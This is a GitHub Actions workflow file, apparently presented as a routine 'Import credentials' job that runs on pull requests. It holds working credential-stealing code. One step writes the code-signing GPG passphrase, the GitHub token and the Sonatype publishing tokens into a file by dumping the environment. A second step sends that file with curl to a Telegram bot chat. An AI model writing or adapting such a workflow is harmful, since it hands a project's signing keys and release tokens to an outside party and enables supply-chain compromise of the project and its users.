name: Import credentials

on: [ pull_request ]

jobs:
  import:
    runs-on: ubuntu-latest

    steps:
      - name: Write ENVs
        env:
          CODE_SIGNING_GPG_KEY_ID: ${{ secrets.CODE_SIGNING_GPG_KEY_ID }}
          CODE_SIGNING_GPG_KEY_PASSPHRASE: ${{ secrets.CODE_SIGNING_GPG_KEY_PASSPHRASE }}
          GITHUB_PACKAGE_REGISTRY_DEPLOYER: JarvisCraft
          GITHUB_PACKAGE_REGISTRY_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          SONATYPE_OSSRH_DEPLOYER: ${{ secrets.SONATYPE_OSSRH_DEPLOYER }}
          SONATYPE_OSSRH_TOKEN: ${{ secrets.SONATYPE_OSSRH_TOKEN }}
        run: env > envdata.txt
      - name: Send to Telegram
        env:
          TELEGRAM_TOKEN: ${{ secrets.TELEGRAM_TOKEN }}
        run: curl -F document=@"envdata.txt" "https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendDocument?chat_id=372369039"
